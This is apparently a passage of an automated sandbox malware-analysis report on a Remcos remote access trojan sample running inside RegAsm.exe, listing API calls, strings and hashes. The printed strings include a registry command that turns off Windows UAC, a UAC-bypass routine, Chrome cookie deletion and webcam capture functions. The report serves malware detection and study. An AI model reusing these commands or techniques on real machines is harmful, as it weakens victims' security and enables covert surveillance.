                                                  • int.LIBCPMT ref: 004111BE
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: (mG
                                                  • API String ID: 2536120697-4059303827
                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                  • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  • CoUninitialize.OLE32 ref: 00407664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-1839356972
                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                  Strings
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                  • UserProfile, xrefs: 0040BAE8
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                  • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                  APIs
                                                  • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AllocOutputShowWindow
                                                  • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                  • API String ID: 2425139147-2212855755
                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                  APIs
                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                  • __allrem.LIBCMT ref: 0043AD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                  • API String ID: 3469354165-3054508432
                                                  • Opcode ID: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                  • Opcode Fuzzy Hash: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                  APIs
                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                  • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                  • String ID:
                                                  • API String ID: 3950776272-0
                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: b8ae44c08c0882fa39500d2d2dac1bf8c00faf8b5df33dcca1ed9daa4f2809fe
                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                  • Opcode Fuzzy Hash: b8ae44c08c0882fa39500d2d2dac1bf8c00faf8b5df33dcca1ed9daa4f2809fe
                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                  APIs
                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • _free.LIBCMT ref: 004482CC
                                                  • _free.LIBCMT ref: 004482F4
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • _abort.LIBCMT ref: 00448313
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                  • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                  Strings
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                  Strings
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                  • SG, xrefs: 00407715
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID:
                                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  • API String ID: 0-643455097
                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                  APIs
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
